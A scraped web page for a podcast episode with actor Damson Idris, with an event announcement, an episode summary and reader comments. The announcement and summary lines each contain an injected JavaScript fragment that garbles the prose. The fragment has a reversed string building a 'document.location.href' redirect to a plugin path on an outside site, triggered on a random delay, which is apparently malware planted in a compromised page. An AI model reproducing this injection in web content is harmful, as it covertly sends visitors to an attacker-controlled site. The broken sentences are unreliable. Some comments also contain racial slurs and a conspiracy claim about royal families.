Wine & Weed w/ Damson Idris | WINE & WEED PODCAST

WINE AND WEED LIVE is coming toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to CHICAGO for ALL STAR WEEKEND. BUY TICKETS HERE
February 14 at 10:30PM at Stage 773

Damson Idris (Snowfall, Black Mirror) joins Steelo and Chris toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to discuss US Black vs UK Black, drinking age, quitting porn, coronavirus, burning money, marriage, alimony, the end of privacy, and give humanity a grade. They drink red wine. Chris, Steelo & John smoke a sativa.




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39 thoughts on “Wine & Weed w/ Damson Idris | WINE & WEED PODCAST”

  1. DrasticK RebEL says:

    People ignorantly confuse discrimination with racism. Racism is when you feel ur above that person or group. Not when you are conditioned to believe they are a certain way because of their heritage or race. It’s a touchy subject. I think the real guts of it is not being discussed and that is that racism is something that is pushed by the royal families to keep us segregated so we don’t work together and overthrow them. It’s been that way for millennia or longer who knows probably ever since the inception of this society

  2. DrasticK RebEL says:

    Not to downgrade your experience at all but I’m white as fuck and I get followed around everywhere the same dude follows me around the grocery store constantly even though I shop there frequently and buy a lot it’s ridiculous, pardon the pun, All because I wear echo and I find the lights bright because I got snow blind so I wear my sunglasses a lot plus I smoke a barrel of weed LOL
    at the end of the day they have a job to do and they have no idea who to profile they’re not investigators there just fucking street punks looking to make a cheque.
    On a positive note it does show how conditioned people are to stereotype instead of actually looking at them as a neutral person and then watching to see if they’re going to steal or not

  3. DrasticK RebEL says:

    People like to get excepted in places they’re not welcome because it makes them feel special when in reality they’re not realizing the Real reason why those places are there it’s because they’ve chosen to segregate themselves away from society so seeking that out shows a deeper underlying issue of self worth and how we measure it

  4. DrasticK RebEL says:

    Aka no fight or flight just hey!!

  5. Michael Sweet says:

    Jams to smoke to? You're welcome. Written, Recorded and produced by yours truly. Smack that mf link

  6. Elijah Barton says:

    I literally just started watching snowfall like last week and then got on YouTube and this was in my recommended I had no idea he was British

  7. Sarah Owens says:

    bring on Jesse Williams

  8. TheRealdealdude2 says:

    Another dope episode. Damson a cool dude man. Snowfall is fire.

  9. Alexander Lamoureux says:

    I’ve been watching this podcasts for like 6 months now and have never commented but would love to add to the comments about THIS BEING THE BEST PODCAST EVER. I’m always so excited for a new episode(: thanks guys like you said last episode this shit can really help with depression.

  10. Lexie Simone says:

    Sexism you forgot about that. The real issue is elitism though

  11. Keith Gardner says:

    #STEELOAKA “aka Shades in the house”

  12. ImALittleBitShi says:

    "My brother doesn't have social media." I wish he did. Frank fine as hell.

  13. Noland Mcdaniel says:

    Can i come on and be myself. Which is nobody famous.

  14. Renee80A says:


  15. Andy Marsden says:

    Great show guys, nice to have a fellow Brit on. Maybe cover a British news story every now and then?

  16. LadyCherie10 says:

    Sterling, don't you ever again be on this podcast with ashy elbows!!!!

  17. seth clarke says:

    I’m Chris aka I thought I had new ones but I forgot em

  18. Xander Chronicles says:

    Well I guess I found another podcast

  19. Camille N says:

    Ngl I was kinda bothered with that you're not black if your not American thing, African people have been calling themselves black for years even in different languages that has nothing to do with Americans you guys just took a generic word and put your entire history behind it and tell people who have already been using the word for years that they can't identify to the word because it's yours now wtf

  20. ashe says:

    Jon be looking good. Proud of ya man :')

  21. adilabidi1099 says:

    Who tf was that Chinese guy

  22. Wild Bill says:

    This is the worst podcast ever…Besides these fools, they would sound better if them Mics where up their assholes…..Vegan#Bs.Fake !

  23. Michael Aibangbee says:


    Not a sane soul on this earth:

    Wine and Weed 17 minutes into the podcast: "Welcome to Wine & Weed!"

  24. seth clarke says:

    Get your dogs cbd they’ll pass out durin pod cast

  25. Chyko Money says:

    John said fuck that nigga Will

  26. Kashamara Green says:

    Yea bro in my own personal experiences, Africans ain't fuckin wit niggas too heavy lol.

  27. Vania Mason says:

    You guys should have Mandii and Weez from Whoreible Decisions. Honestly, that's a lot of personality in one room that would be a great episode.

  28. Kyle Wakeland says:

    Who else is from Rob and big to fantasy factory, ridiculousness and wine and weed, from Rob's house to Steelos

  29. Alexis G says:

    17 mins in and no intro, nah yall bugging

  30. Keelah Covington says:

    He’s so cute (Damson Idris) said “A.K.A Yo mama wants my autograph” he’s so cute and clever. Dammmmmmmsssssoooonnnnn !!!!

  31. Marquis Lawson says:

    Steelo just ashy LMAO

  32. SunshineRain says:

    How can you tell another Black person that they can’t call themselves Black… the ignorance lmfao

  33. ashley johnson says:

    My first drink was super young, but I remember w/my friends at 13- off them four lokos

  34. Shanae Brooks says:

    the background instrumental is way too loud, becomes quite distracting whilst watching!! love Damson Idris tho amazing actor!!!!!

  35. Nkosi Mataka says:

    As an African we see other blacks struggles and we see that black people in these first world countries are being oppressed BUT we see you as being oppressed in a FIRST WORLD COUNTRY. while in countries like my mother zambia somewhere around 50% of our people are living below the poverty line and we are the majority. Granted i at least take responsibility for our fuck ups and think you other black people should too but while you people feel bad as a group we feel bad as a country (I mean my country within Africa) its a totally different feeling and seeing a whole country suffer because the rest of the world is taking advantage of you with systems you didn't even help build. And that, I know every black person can relate to

  36. Dolly Bouzi says:

    I think if we had equity in all aspect the world can be a decent place. D- for me

  37. LadyDi M says:

    Dam Son made this episode fabulous. I love British accents and so I can hear this man's voice again, please invite him back… Soon… Please…

  38. Stephanie Germain says:

    I loved this. I love Damson. I actually laughed out loud

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